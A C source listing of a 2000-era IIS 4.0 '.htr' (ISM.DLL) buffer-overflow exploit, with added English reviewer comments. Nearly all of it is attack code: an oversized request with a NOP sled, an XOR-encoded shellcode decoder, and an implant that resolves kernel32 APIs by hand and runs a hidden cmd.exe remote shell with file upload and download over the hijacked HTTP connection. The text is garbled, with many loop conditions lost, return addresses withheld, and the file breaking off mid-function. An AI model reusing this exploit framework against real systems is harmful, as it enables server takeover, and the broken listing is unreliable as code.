windows下强大功能的溢出程序源代码

/*------------------------------------------------------------------*/
/*  IIS 4.0 ".htr" (ISM.DLL) buffer-overflow attack program          */
/*  Author: yuange (yuange@nsfocus.com)                              */
/*                                                                    */
/*  Original header, translated:                                      */
/*  - Works against every language edition of Windows.                */
/*  - The shellcode binds cmd.exe to the existing HTTP connection,    */
/*    implements a small "ftp" (upload / download of files) and XORs  */
/*    the traffic; it opens no new port and no service, which the     */
/*    author presents as a way past firewalls.                        */
/*  - The shellcode is written as ordinary C / inline-asm functions   */
/*    whose compiled bytes are lifted out of the running binary, so   */
/*    it can be written, modified and debugged like normal code.      */
/*  - Claims to solve: (1) locating the overflow point, (2) locating  */
/*    the shellcode, (3) finding a "jmp esp"-style return address,    */
/*    (4) resolving Windows API addresses across OS versions.         */
/*  - Another version replaces every served web page without touching */
/*    the page files on disk.                                         */
/*  - The framework can be reused for ordinary overflow exploits.     */
/*  - Compiles under VC 6.0.                                          */
/*                                                                    */
/*  Reviewer notes:                                                   */
/*  - Historical proof-of-concept (2000) against IIS 4.0; kept as a   */
/*    reference for the technique, not as a working tool.             */
/*  - The return-address / argument-pointer constants below were      */
/*    deliberately withheld by the author ("0xxxxx" placeholders and  */
/*    "\xxx" string escapes); the file does not compile as posted.    */
/*  - The listing was lifted from an HTML page: everything that       */
/*    looked like a tag ("<...>") was stripped, which removed the     */
/*    include file names and the condition of most loops written as   */
/*    for(i=0;i<N;++i){ ... }.  Those spots are marked below as       */
/*    "condition lost in extraction" and are NOT reconstructed.       */
/*  - On-the-wire signature of the packet as built here: a ~128 KB    */
/*    request line "GET /\xffdefault.htr/" followed by a long run of  */
/*    'B' (0x42, the NOP sled) and ending in ".HTR HTTP/1.1".         */
/*------------------------------------------------------------------*/
/* iis4。0  overflow program ver 1.0 copy by yuange  2000。05。8 */

/* NOTE(review): the four header names were stripped together with the
 * HTML tags.  Judging by the identifiers used (WSAStartup, SOCKET,
 * CreateProcess, gets, atoi) they were the WinSock / Windows / C runtime
 * headers -- restore them before building. */
#include
#include
#include
#include

#define  FNENDLONG   0x08    /* length of the NOP run that marks the end of a shellcode function */
#define  NOPCODE     'B'    // INC EDX    0x90 -- printable one-byte NOP used as the sled filler
#define  NOPLONG     0x50   /* sled length between the return-address area and the decoder */
#define  BUFFSIZE    0x20000 /* size of the request buffer (and of the receive buffer) */
#define  PATHLONG    0x12 // length of the physical web root, e.g. c:\inetpub\wwwroot (18 bytes)
// The overflow offset depends on the physical path: when IIS handles "GET /"
// it prepends the physical path before handing the name to ISM.DLL.  The
// path length can be obtained first through the .IDC/.ida/.idq physical-path
// disclosure bugs.
#define  RETEIPADDRESS 0xxxxx-PATHLONG+4+4
#define  ADD1          0xxxx-0xxxxx-PATHLONG+4
#define  ADD2      0xxxxx-0xxxxx-PATHLONG+4 /* for certain reasons this data is not provided  2000.10.25 */
// ADD1/ADD2: the two argument addresses that must be handled; the original
// refers to comments on ISM.DLL's faulty code "later" -- they are not
// present in this listing.
#define  SHELLBUFFSIZE 0x800   /* I/O buffer inside the implant */
#define  SHELLFNNUMS   12      /* number of API names in the string table (see str in main) */
#define  DATAXORCODE   0xAA    /* XOR key applied to the second-stage payload bytes */
#define  LOCKBIGNUM    19999999 /* modulus of the link keystream generator (fixed, not a secret) */
#define  LOCKBIGNUM2   13579139 /* seed of the link keystream generator (fixed, not a secret) */
#define  WEBPORT       80

void     shellcodefnlock();                      /* stage 1: in-place decoder stub */
void     shellcodefn(char *ecb);                 /* stage 2: cmd.exe-over-HTTP implant */
void     cleanchkesp(char *fnadd,char *shellbuff,char *chkespadd ,int len); /* strip debug _chkesp calls from lifted code */
void     iisput(int fd,char *str);               /* console command: upload a file */
void     iisget(int fd,char *str);               /* console command: download a file */
int      newrecv(int fd,char *buff,int size,int flag); /* recv + keystream XOR */
int
newsend(int fd,char *buff,int size,int flag);   /* keystream XOR + send (encodes in place) */

/* Client-side link state: once the implant answers "XORDATA", every byte
 * received is XORed with a keystream driven by lockintvar1 and every byte
 * sent with one driven by lockintvar2.  Both start from the same fixed
 * seed (LOCKBIGNUM2 % LOCKBIGNUM), so this is obfuscation against casual
 * sniffing, not encryption: anyone with this source decodes the session. */
int      xordatabegin;
int      lockintvar1,lockintvar2;
char     lockcharvar;

/* Entry point.
 *   argv[1]  target host, "http://host/..." prefix tolerated
 *   argv[2]  overflow offset tweak (0-3 according to the prompt text)
 *   argv[3]  web port (default 80)
 *   argv[4]  alternative request prefix (default "GET /\xffdefault.htr/")
 *   argv[6]  "debug": run the payload in this process instead of sending
 * Builds the oversized .HTR request, sends it, then acts as an interactive
 * console to the injected cmd.exe (extra local commands: iisput / iisget).
 * Prompts with gets() when arguments are missing -- unbounded reads. */
int main(int argc, char **argv)
{
char *server;
/* String table appended after the lifted shellcodefn bytes.  Order matters:
 * the implant resolves the first SHELLFNNUMS-1 names with GetProcAddress,
 * then uses "cmd.exe", "\r\nexit\r\n" and "XORDATA" by fixed offsets. */
char *str="LoadLibraryA""\x0""CreatePipe""\x0" "CreateProcessA""\x0""CloseHandle""\x0" "PeekNamedPipe""\x0" "ReadFile""\x0""WriteFile""\x0" "CreateFileA""\x0" "GetFileSize""\x0" "GetLastError""\x0" "Sleep""\x0" "cmd.exe""\x0""\x0d\x0a""exit""\x0d\x0a""\x0" "XORDATA""\x0" "strend";
char buff1[]="GET /""\xff""default.htr/";
char buff2[]=".HTR HTTP/1.1 \nHOST:";
/* 9 x 0x90; only FNENDLONG (8) bytes are compared when searching for it */
char *fnendstr="\x90\x90\x90\x90\x90\x90\x90\x90\x90";
char SRLF[]="\x0d\x0a\x00\x00";
/* Return addresses / pointer values withheld by the author ("\xxx" is not
 * a valid hex escape, so these lines do not compile as posted). */
char eipexcept1[] ="\xxx\xxx\xxx\xxx";
// char eipexcept[] ="\xxx\xxx\xxx\xxx"; // ret
char  eipexcept[]="\xxx\xxx\xxx\xxx";
char  eipwinnt[] ="\xxx\xxx\xxx\xxx";
char  eipwinnt2[]="\xxx\xxx\xxx\xxx";
char  reteax[]   ="\xxx\xxx\xxx\xxx"; /* for certain reasons this data is not provided  2000.10.25 */
/* 4 NOPs + "ff 63 64" = jmp dword ptr [ebx+0x64]; EBX is assumed to hold
 * the ECB pointer at hijack time (see the "ecb" note in shellcodefnlock) */
char  eipjmpshell[]="\x90\x90\x90\x90\xff\x63\x64";
char    buff[BUFFSIZE];
char    recvbuff[BUFFSIZE];
char    shellcodebuff[0x1000];
struct  sockaddr_in s_in2,s_in3;
struct  hostent *he;
char    *shellcodefnadd,*chkespadd;
unsigned  int sendpacketlong;
int       i,j,k;
unsigned  char temp;
int       fd;
u_short   port,port1,shellcodeport;
SOCKET    d_ip;
WSADATA   wsaData;
int       offset=0;
int       OVERADD=RETEIPADDRESS;
int       result;
fprintf(stderr,"\n IIS4.0 OVERFLOW PROGRAM 2.0 .");
fprintf(stderr,"\n copy by yuange(yuange@nsfocus.com) 2000.6.2.");
fprintf(stderr,"\n welcome to my homepage http://yuange.yeah.net/ .");
fprintf(stderr,"\n welcome to http://www.nsfocus.com/ .");
fprintf(stderr,"\n usage: %s [offset] [webport] \n", argv[0]);
if(argc <2){
fprintf(stderr,"\n please enter the web server:");
gets(recvbuff);   /* unbounded read into a 128 KB stack buffer */
for(i=0;i /* condition lost in extraction */ if(recvbuff[i]!=' ') break; }
server=recvbuff;
if(i /* condition lost in extraction */ fprintf(stderr,"\n please enter the offset(0-3):");
gets(buff);
for(i=0;i /* condition lost in extraction */ if(buff[i]!=' ') break; }
offset=atoi(buff+i);
}
result= WSAStartup(MAKEWORD(1, 1), &wsaData);
if (result != 0) {
fprintf(stderr, "Your computer was not connected " "to the Internet at the time that " "this program was launched, or you " "do not have a 32-bit " "connection to the Internet.");
exit(1);
}
if(argc>2){
offset=atoi(argv[2]);
}
OVERADD+=offset;   /* offset shifts the whole return-address area */
/* if(offset<0||offset>3){ fprintf(stderr,"\n offset error !offset  0 - 3 ."); gets(buff); exit(1); } */
if(argc <2){
//     WSACleanup( );
//       exit(1);
}
else  server = argv[1];
/* Skip leading blanks, then an optional "scheme://" prefix */
for(i=0;i /* condition lost in extraction */ if(server[i]!=' ') break; }
if(i /* condition lost in extraction */ for(i=0;i+3 /* condition lost in extraction */ if(server[i]==':'){
if(server[i+1]=='\\'||server[i+1]=='/'){
if(server[i+2]=='\\'||server[i+2]=='/'){
server+=i;
server+=3;
break;
}
}
}
}
/* Cut the host at the first path separator; strlen() is re-evaluated every
 * iteration, so the loop ends right after the NUL is written */
for(i=1;i<=strlen(server);++i){
if(server[i-1]=='\\'||server[i-1]=='/') server[i-1]=0;
}
d_ip = inet_addr(server);
if(d_ip==-1){
he = gethostbyname(server);
if(!he) {
WSACleanup( );
printf("\n Can't get the ip of %s !\n",server);
gets(buff);
exit(1);
}
else    memcpy(&d_ip, he->h_addr, 4);
}
if(argc>3) port=atoi(argv[3]);
else   port=WEBPORT;
if(port==0) port=WEBPORT;
fd = socket(AF_INET, SOCK_STREAM,0);
i=8000;   /* 8 s receive timeout; return value of setsockopt is not checked */
setsockopt(fd,SOL_SOCKET,SO_RCVTIMEO,(const char *) &i,sizeof(i));
s_in3.sin_family = AF_INET;
s_in3.sin_port = htons(port);
s_in3.sin_addr.s_addr = d_ip;
printf("\n nuke ip: %s port %d",inet_ntoa(s_in3.sin_addr),htons(s_in3.sin_port));
if(connect(fd, (struct sockaddr *)&s_in3, sizeof(struct sockaddr_in))!=0)  {
closesocket(fd);
WSACleanup( );
fprintf(stderr,"\n  connect err.");
gets(buff);
exit(1);
}
/* Locate the VC debug-runtime _chkesp routine.  The cmp/call pair mirrors
 * what the compiler emits after every call in a debug build, which forces
 * _chkesp to be linked so its address can be taken.  If the address is an
 * incremental-link thunk (E9 = jmp rel32) it is followed to the real body. */
_asm{
mov ESI,ESP
cmp ESI,ESP
}
_chkesp();
chkespadd=_chkesp;
temp=*chkespadd;
if(temp==0xe9) {
++chkespadd;
i=*(int*)chkespadd;
chkespadd+=i;
chkespadd+=4;
}
/* Stage 1: lift the decoder stub's bytes straight out of this process.
 * Same E9-thunk handling, then search for the 8-NOP marker that opens
 * shellcodefnlock's asm block. */
shellcodefnadd=shellcodefnlock;
temp=*shellcodefnadd;
if(temp==0xe9) {
++shellcodefnadd;
k=*(int *)shellcodefnadd;
shellcodefnadd+=k;
shellcodefnadd+=4;
}
for(k=0;k<=0x500;++k){
if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break;
}
/* Whole request buffer is the sled: 'B' = INC EDX is harmless to execute
 * and survives URL handling. */
memset(buff,NOPCODE,BUFFSIZE);
if(argc>4){
memcpy(buff,argv[4],strlen(argv[4]));
}
else  memcpy(buff,buff1,strlen(buff1));
/* Copy 0x80 bytes of decoder starting 4 bytes into its leading NOP run,
 * NOPLONG bytes past the return-address area. */
memcpy(buff+OVERADD+NOPLONG,shellcodefnadd+k+4,0x80);
/* Stage 2: lift shellcodefn's bytes up to the 8-NOP marker that closes
 * its trailing asm block, patch out _chkesp calls, append the string
 * table (everything in str before "strend"). */
shellcodefnadd=shellcodefn;
temp=*shellcodefnadd;
if(temp==0xe9) {
++shellcodefnadd;
k=*(int *)shellcodefnadd;
shellcodefnadd+=k;
shellcodefnadd+=4;
}
for(k=0;k<=0x1000;++k){
if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break;
}
memcpy(shellcodebuff,shellcodefnadd,k);
cleanchkesp(shellcodefnadd,shellcodebuff,chkespadd,k);
for(i=0;i<0x400;++i){
if(memcmp(str+i,"strend",6)==0) break;
}
memcpy(shellcodebuff+k,str,i);
sendpacketlong=k+i;
/* Find the "shell:" NOP run inside the copied decoder: the encoded stage 2
 * is written from there on, and the decoder decodes it in place. */
for(k=0;k<=0x200;++k){
if(memcmp(buff+OVERADD+NOPLONG+k,fnendstr,FNENDLONG)==0) break;
}
/* Encode stage 2: XOR with DATAXORCODE, then escape any byte the HTTP/URL
 * path would mangle (controls, space, '.', '/', backslash, '0', '?', '%')
 * as '0' followed by byte+0x40.  The decoder reverses exactly this. */
for(i=0;i /* condition lost in extraction */ temp=shellcodebuff[i];
temp^=DATAXORCODE;
if(temp<=0x10||temp==' '||temp=='.'||temp=='/'||temp=='\\'||temp=='0'||temp=='?'||temp=='%'){
buff[OVERADD+NOPLONG+k]='0';
++k;
temp+=0x40;
}
buff[OVERADD+NOPLONG+k]=temp;
++k;
}
//  memcpy(buff+OVERADD+NOPLONG+k,shellcodebuff,sendpacketlong);
//  k+=sendpacketlong;
/* Pave the two argument-pointer areas and the saved-EIP area with the
 * withheld constants; after the second loop i == 0x30, so the next five
 * writes land at OVERADD+0x30 .. OVERADD+0x46, followed by sled up to the
 * decoder at OVERADD+NOPLONG (0x50). */
for(i=-0x30;i<0x30;i+=4){
memcpy(buff+ADD1+offset+i,eipexcept,4);
memcpy(buff+ADD2+offset+i,eipexcept,4);
}
for(i=-0x30;i<0x30;i+=4){
memcpy(buff+OVERADD+i,eipexcept,4);
}
memcpy(buff+OVERADD+i,eipwinnt2,4);
memcpy(buff+OVERADD+i+4,reteax,4);
memcpy(buff+OVERADD+i+8,eipwinnt,4);
memcpy(buff+OVERADD+i+0x0c,eipwinnt,4);
memcpy(buff+OVERADD+i+0x10,eipjmpshell,7);
// fprintf(stderr,"\n send:\n %s",buff);
fprintf(stderr,"\n offset:%d",offset);
/* if(argc>2){ server=argv[2]; if(strcmp(server,"win9x")==0){ memcpy(buff+OVERADD,eipwin9x,4); fprintf(stderr,"\n nuke win9x."); } if(strcmp(server,"winnt")==0){ memcpy(buff+OVERADD,eipwinnt,4); fprintf(stderr,"\n nuke winnt."); } } */
/* Terminate the request line right after the encoded payload; the final
 * strcpy also writes the NUL that ends the decoder's input. */
sendpacketlong=k+OVERADD+NOPLONG;
strcpy(buff+sendpacketlong,buff2);
strcpy(buff+sendpacketlong+strlen(buff2),server);
strcpy(buff+sendpacketlong+strlen(buff2)+strlen(server),"\n\n");
// printf("\n send buff:\n%s",buff);
//  strcpy(buff+OVERADD+NOPLONG,shellcode);
sendpacketlong=strlen(buff);
/* #ifdef DEBUG _asm{ lea esp,buff add esp,OVERADD ret } #endif */
/* Local test mode: point ESP into the crafted buffer and "return" into it,
 * simulating the hijack in this process. */
if(argc>6){
if(strcmp(argv[6],"debug")==0){
_asm{
lea esp,buff
add esp,OVERADD
ret
}
}
}
xordatabegin=0;
for(i=0;i<1;++i){
j=sendpacketlong;
fprintf(stderr,"\n send  packet %d bytes.",j);
send(fd,buff,j,0);   /* return value unchecked */
k=newrecv(fd,recvbuff,0x1000,0);
/* "XORDATA" from the implant = exploitation succeeded; switch on the
 * keystream for the rest of the session */
if(k>=8&&memcmp(recvbuff,"XORDATA",8)==0) {
xordatabegin=1;
k=-1;
fprintf(stderr,"\n ok!\n");
}
if(k>0){
recvbuff[k]=0;
fprintf(stderr,"\n  recv:\n %s",recvbuff);
}
}
k=1;
ioctlsocket(fd, FIONBIO, &k);   /* non-blocking from here on */
// fprintf(stderr,"\n now begin: \n");
lockintvar1=LOCKBIGNUM2%LOCKBIGNUM;
lockintvar2=lockintvar1;
k=1;
/* Console loop: when recv() has nothing (k<0, non-blocking), read a line
 * from the operator; "iisput"/"iisget" are handled locally, anything else
 * goes to the remote cmd.exe with CRLF appended. */
while(k!=0){
if(k<0){
i=0;
while(i==0){
gets(buff);   /* unbounded read */
if(memcmp(buff,"iisput",6)==0){
iisput(fd,buff+6);
}
else{
if(memcmp(buff,"iisget",6)==0){
iisget(fd,buff+6);
}
else i=1;
}
}
k=strlen(buff);
memcpy(buff+k,SRLF,3);
newsend(fd,buff,k+2,0);
}
k=newrecv(fd,buff,0x1000,0);
if(xordatabegin==0&&k>=8&&memcmp(buff,"XORDATA",8)==0){
xordatabegin=1;
k=-1;
}
if(k>0){
buff[k]=0;
fprintf(stderr,"%s",buff);
}
//   if(k==0) break;
}
closesocket(fd);
WSACleanup( );
fprintf(stderr,"\n the server close connect.");
gets(buff);
return(0);
}

/* Stage-1 decoder stub.  Only the bytes between the two 8-NOP markers are
 * ever executed on the target (main() lifts 0x80 bytes starting 4 bytes
 * into the first run).  It:
 *   1. looks up a pointer via [ESI+0x474] (what ESI points to at hijack
 *      time is not visible here -- presumably an ISM.DLL structure) and
 *      writes a NUL 8 bytes into the object it finds;
 *   2. uses call/pop to get the address of "shell:", sets EDI=ESI to it,
 *      pushes EBX twice (argument + fake return address for
 *      shellcodefn(ecb); EBX is taken to be the ECB pointer);
 *   3. decodes the stage-2 stream in place until it meets a NUL:
 *      '0' is an escape (next byte - 0x40), then every byte is XORed with
 *      DATAXORCODE -- the exact inverse of the encoder in main();
 *   4. jumps to "shell:", which now holds the decoded shellcodefn.
 * In-place decoding is safe because an escape consumes two input bytes
 * for one output byte, so the write pointer never overtakes the read
 * pointer. */
void  shellcodefnlock()
{
_asm{
nop
nop
nop
nop
nop
nop
nop
nop
_emit('?')
xor ecx,ecx
add si,474h
cmp dword ptr [esi],ecx
jnz getesi
add si,4
getesi:          mov esi,[esi]
add si,8
xor ecx,ecx
mov byte ptr [esi],cl
jmp   next
getediadd:      pop   EDI
push  EDI
pop   ESI
push  ebx   //  ecb
push  ebx   //  call shellcodefn ret address
xor   ecx,ecx
looplock:         lodsb
cmp  al,cl
jz   shell
cmp  al,0x30
jz   clean0
sto:              xor  al,DATAXORCODE
stosb
jmp  looplock
clean0:           lodsb
sub al,0x40
jmp sto
next:             call  getediadd
shell:           NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
}
}

/* Stage-2 implant, compiled as a normal function and shipped as raw bytes.
 * It must be position independent and must not touch any global of this
 * binary, which is why every API pointer and the keystream state are
 * locals (the lockintvar locals shadow the file-level globals for that
 * reason).  ecb is the ISAPI EXTENSION_CONTROL_BLOCK of the hijacked
 * request; the offsets used (ConnID at +8, WriteClient at +0x84,
 * ReadClient at +0x88) match that structure, and all traffic to the
 * attacker goes through those two callbacks on the existing HTTP
 * connection -- no listener, no new socket.  Flow:
 *   - install a one-off SEH frame so that probing unmapped pages during
 *     the kernel32 scan resumes instead of killing the worker;
 *   - scan 64 KB-aligned addresses for an "MZ"/"PE" image whose export
 *     name starts with "KERNEL32", and pull GetProcAddress out of its
 *     export table by hand;
 *   - resolve the API names from the string table, spawn hidden cmd.exe
 *     on two pipes, send "XORDATA" and then relay pipe <-> client with a
 *     keystream XOR, handling "put <len> <name>" and "get <name>" as a
 *     minimal file transfer. */
void shellcodefn(char *ecb)
{
char        Buff[SHELLBUFFSIZE+2];
int         *except[3];   /* [0] next handler (-1 = end), [1] handler, [2] saved FS:[0] */
/* The eleven FARPROC locals below are filled through apifnadd[k], k>=1,
 * i.e. by writing past the 1-element array.  This relies on VC6 laying
 * these locals out contiguously in reverse declaration order -- fragile,
 * and any change to the declarations or compiler settings breaks it. */
FARPROC     Sleepadd;
FARPROC     GetLastErroradd;
FARPROC     GetFileSizeadd;
FARPROC     CreateFileAadd;
FARPROC     WriteFileadd;
FARPROC     ReadFileadd;
FARPROC     PeekNamedPipeadd;
FARPROC     CloseHandleadd;
FARPROC     CreateProcessadd;
FARPROC     CreatePipeadd;
FARPROC    procloadlib;
FARPROC     apifnadd[1];
FARPROC     procgetadd=0;
FARPROC     writeclient= *(int *)(ecb+0x84);
FARPROC     readclient = *(int *)(ecb+0x88);
HCONN       ConnID     = *(int *)(ecb+8) ;
char        *stradd;   /* cursor into the string table appended after this code */
int         imgbase,fnbase,i,k,l;
HANDLE      libhandle,fpt;   //libwsock32;
STARTUPINFO siinfo;
PROCESS_INformATION ProcessInformation;
HANDLE   hReadPipe1,hWritePipe1,hReadPipe2,hWritePipe2;
int         lBytesRead;
int  lockintvar1,lockintvar2;
char lockcharvar;
SECURITY_ATTRIBUTES sa;
/* call/pop trick: stradd = address right after "call getstradd", which is
 * where main() glued the string table.  Then hook FS:[0] to &except. */
_asm {
jmp    nextcall
getstradd:   pop    stradd
lea    EDI,except
mov    eax,dword ptr FS:[0]
mov    dword ptr [edi+0x08],eax
mov    dword ptr FS:[0],EDI
}
except[0]=0xffffffff;
except[1]=stradd-0x07;   /* = execptprogram (jmp errprogram, 2 bytes) + call (5 bytes) before stradd */
imgbase=0x77e00000;
/* Records the address of the instruction after this call as the resume
 * point patched into errprogram (see the asm at the end). */
_asm{
call getexceptretadd
}
/* NOTE: the comma operator means only procgetadd==0 is tested; the
 * 0xbffa0000 bound is never enforced, so an unsuccessful scan keeps going. */
for(;imgbase<0xbffa0000,procgetadd==0;){
imgbase+=0x10000;
if(imgbase==0x78000000) imgbase=0xbff00000;   /* NT range exhausted: try the Win9x kernel32 range */
/* 'ZM' / 'EP' are little-endian "MZ" / "PE" */
if(*( WORD *)imgbase=='ZM'&& *(WORD *)(imgbase+*(int *)(imgbase+0x3c))=='EP'){
fnbase=*(int *)(imgbase+*(int *)(imgbase+0x3c)+0x78)+imgbase;   /* export directory (DataDirectory[0]) */
k=*(int *)(fnbase+0xc)+imgbase;                                 /* export Name RVA */
if(*(int *)k =='NREK'&&*(int *)(k+4)=='23LE'){                  /* "KERNEL32" */
libhandle=imgbase;
k=imgbase+*(int *)(fnbase+0x20);                                /* AddressOfNames */
for(l=0;l<*(int *) (fnbase+0x18);++l,k+=4){                     /* NumberOfNames */
if(*(int *)(imgbase+*(int *)k)=='PteG'&&*(int *)(4+imgbase+*(int *)k)=='Acor'){   /* "GetProcA" */
k=*(WORD *)(l+l+imgbase+*(int *)(fnbase+0x24));                 /* AddressOfNameOrdinals[l] */
k+=*(int *)(fnbase+0x10)-1;   /* + Base - 1: only correct when the export Base is 1, as it is for kernel32 */
k=*(int *)(k+k+k+k+imgbase+*(int *)(fnbase+0x1c));              /* AddressOfFunctions[k] */
procgetadd=k+imgbase;
break;
}
}
}
}
}
// Searches for the KERNEL32.DLL module base and the address of GetProcAddress.
// Note that the "page not present" case during the search is handled (SEH above).
_asm{
lea edi,except
mov eax,dword ptr [edi+0x08]
mov dword ptr fs:[0],eax
}
if(procgetadd==0) goto  die ;
/* Resolve each NUL-separated name in the string table; stradd is left
 * pointing at "cmd.exe" afterwards. */
for(k=1;k /* condition lost in extraction */ apifnadd[k]=procgetadd(libhandle,stradd);
for(;;++stradd){
if(*(stradd)==0&&*(stradd+1)!=0) break;
}
++stradd;
}
sa.nLength=12;   /* sizeof(SECURITY_ATTRIBUTES) on 32-bit */
sa.lpSecurityDescriptor=0;
sa.bInheritHandle=TRUE;
CreatePipeadd(&hReadPipe1,&hWritePipe1,&sa,0);   /* pipe 1: cmd.exe stdout/stderr -> us */
CreatePipeadd(&hReadPipe2,&hWritePipe2,&sa,0);   /* pipe 2: us -> cmd.exe stdin */
// ZeroMemory(&siinfo,sizeof(siinfo));
/* 0x11 dwords = 68 bytes = sizeof(STARTUPINFOA); done in asm to avoid
 * calling into the CRT from lifted code */
_asm{
lea EDI,siinfo
xor eax,eax
mov ecx,0x11
repnz stosd
}
siinfo.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
siinfo.wShowWindow = SW_HIDE;
siinfo.hStdInput = hReadPipe2;
siinfo.hStdOutput=hWritePipe1;
siinfo.hStdError =hWritePipe1;
// k=0;
// while(k==0){
k=CreateProcessadd(NULL,stradd,NULL,NULL,1,0,NULL,NULL,&siinfo,&ProcessInformation);   /* stradd = "cmd.exe", handles inherited */
stradd+=8;   /* now "\r\nexit\r\n" (9 bytes with its NUL); stradd+9 is "XORDATA" */
// }
PeekNamedPipeadd(hReadPipe1,Buff,SHELLBUFFSIZE,&lBytesRead,0,0);
k=8;
writeclient(ConnID,stradd+9,&k,0);   /* tell the client to switch on the keystream */
lockintvar1=LOCKBIGNUM2%LOCKBIGNUM;
lockintvar2=lockintvar1;
/* Relay loop.  Keystream (both directions, same fixed seed):
 *   s = (s * 0x100) % LOCKBIGNUM;  byte ^= (char)(s % 0x100)
 * s * 0x100 can exceed INT_MAX, so this depends on the same wraparound
 * behaviour on both ends (it is undefined behaviour in C). */
while(1){
PeekNamedPipeadd(hReadPipe1,Buff,SHELLBUFFSIZE,&lBytesRead,0,0);
if(lBytesRead>0){
ReadFileadd(hReadPipe1,Buff,lBytesRead,&lBytesRead,0);
if(lBytesRead>0){
for(k=0;k /* condition lost in extraction */ lockintvar2=lockintvar2*0x100;
lockintvar2=lockintvar2%LOCKBIGNUM;
lockcharvar=lockintvar2%0x100;
Buff[k]^=lockcharvar;
}
writeclient(ConnID,Buff,&lBytesRead,0);
}
}
else{
lBytesRead=SHELLBUFFSIZE;
l=0;
while(l==0){
/* NOTE: lBytesRead is only reset to SHELLBUFFSIZE before the first
 * iteration; later ReadClient calls are capped at the previous count. */
k=readclient(ConnID,Buff,&lBytesRead);
for(l=0;l /* condition lost in extraction */ lockintvar1=lockintvar1*0x100;
lockintvar1=lockintvar1%LOCKBIGNUM;
lockcharvar=lockintvar1%0x100;
Buff[l]^=lockcharvar;
}
/* "put " + 4-byte length + filename at +8: receive a file from the client.
 * The path is used as-is and the handle is never checked for
 * INVALID_HANDLE_VALUE before WriteFile. */
if(k==1&&lBytesRead>4&&Buff[0]=='p'&&Buff[1]=='u'&&Buff[2]=='t'&&Buff[3]==' '){
l=*(int *)(Buff+4);
//                 WriteFileadd(fpt,Buff,lBytesRead,&lBytesRead,NULL);
fpt=CreateFileAadd(Buff+0x8,FILE_FLAG_WRITE_THROUGH+GENERIC_WRITE,FILE_SHARE_READ,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0) ;
k=GetLastErroradd();
i=0;
while(l>0){
k=readclient(ConnID,Buff,&lBytesRead);
if(k==1){
if(lBytesRead>0){
for(k=0;k /* condition lost in extraction */ lockintvar1=lockintvar1*0x100;
lockintvar1=lockintvar1%LOCKBIGNUM;
lockcharvar=lockintvar1%0x100;
Buff[k]^=lockcharvar;
}
l-=lBytesRead;
WriteFileadd(fpt,Buff,lBytesRead,&lBytesRead,NULL);
}
}
else{
Sleepadd(0100);   /* octal: 64 ms */
++i;
}
if(i>10000) l=0;   /* give up after ~10000 failed reads */
}
CloseHandleadd(fpt);
l=0;
}
else{
/* "get " + filename at +4: send a file to the client, preceded by an
 * 8-byte "size" header (little-endian 'ezis' + length). */
if(k==1&&lBytesRead>4&&Buff[0]=='g'&&Buff[1]=='e'&&Buff[2]=='t'&&Buff[3]==' '){
fpt=CreateFileAadd(Buff+4,GENERIC_READ,FILE_SHARE_READ+FILE_SHARE_WRITE,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);
Sleepadd(100);
l=GetFileSizeadd(fpt,&k);   /* no handle check: a bad path yields an error size and an empty/garbage transfer */
*(int *)Buff='ezis';        //size
*(int *)(Buff+4)=l;
lBytesRead=8;
for(i=0;i /* condition lost in extraction */ lockintvar2=lockintvar2*0x100;
lockintvar2=lockintvar2%LOCKBIGNUM;
lockcharvar=lockintvar2%0x100;
Buff[i]^=lockcharvar;
}
writeclient(ConnID,Buff,&lBytesRead,0);
//    Sleepadd(100);
i=0;
while(l>0){
k=SHELLBUFFSIZE;
ReadFileadd(fpt,Buff,k,&k,0);
if(k>0){
for(i=0;i /* condition lost in extraction */ lockintvar2=lockintvar2*0x100;
lockintvar2=lockintvar2%LOCKBIGNUM;
lockcharvar=lockintvar2%0x100;
Buff[i]^=lockcharvar;
}
i=0;
l-=k;
writeclient(ConnID,Buff,&k,0); // HSE_IO_SYNC);
//                                    Sleepadd(100);
}
else ++i;
if(i>100) l=0;
}
CloseHandleadd(fpt);
l=0;
}
else l=1;
}
}
/* ReadClient failed (client gone): ask cmd.exe to exit and park the
 * thread forever -- the worker thread never returns to IIS. */
if(k!=1){
k=8;
WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe
WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe
WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe
while(1){
Sleepadd(0x7fffffff);
}                  // hang forever
}
else{
WriteFileadd(hWritePipe2,Buff,lBytesRead,&lBytesRead,0);   /* plain command line -> cmd.exe stdin */
//             Sleepadd(1000);
}
}
}
die: goto die  ;
/* Helpers referenced above.  Byte layout backwards from stradd is fixed
 * and relied upon: call getstradd (5) | jmp errprogram (2) | ret (1) |
 * xor eax,eax (2) | mov [eax],imm32 (6) -- so the handler is stradd-7 and
 * the imm32 placeholder 0x11223344 sits at stradd-0xe.
 *   getexceptretadd: stores its own return address into that placeholder.
 *   errprogram: SEH handler; [esp+0xc] is the CONTEXT, +0xb8 is Eip; sets
 *     Eip to the stored address and returns 0 (ExceptionContinueExecution)
 *     so a fault while probing an unmapped page resumes the scan loop. */
_asm{
getexceptretadd:   pop  eax
push eax
mov  edi,dword ptr [stradd]
mov dword ptr [edi-0x0e],eax
ret
errprogram:       mov eax,dword ptr [esp+0x0c]
add eax,0xb8
mov dword ptr [eax],0x11223344  //stradd-0xe
xor eax,eax        //2
ret            //1
execptprogram:     jmp errprogram    //2 bytes stradd-7
nextcall:          call getstradd    //5 bytes
NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
}
}

/* Remove VC debug-build "call _chkesp" instructions from a lifted copy of a
 * function: every E8 rel32 whose target (computed relative to fnadd, the
 * function's real address) equals chkesp is overwritten with NOP plus two
 * inc/dec ebx pairs (5 bytes, net effect none).  Without this the shellcode
 * would call an absolute address that does not exist on the target.
 *   fnadd     address of the original function in this process
 *   shellbuff copy of its bytes, patched in place
 *   chkesp    resolved address of _chkesp
 *   len       number of bytes in shellbuff */
void cleanchkesp(char *fnadd,char *shellbuff,char * chkesp,int len)
{
int i,k;
unsigned char temp;
char *calladd;
for(i=0;i /* condition lost in extraction */ temp=shellbuff[i];
if(temp==0xe8){
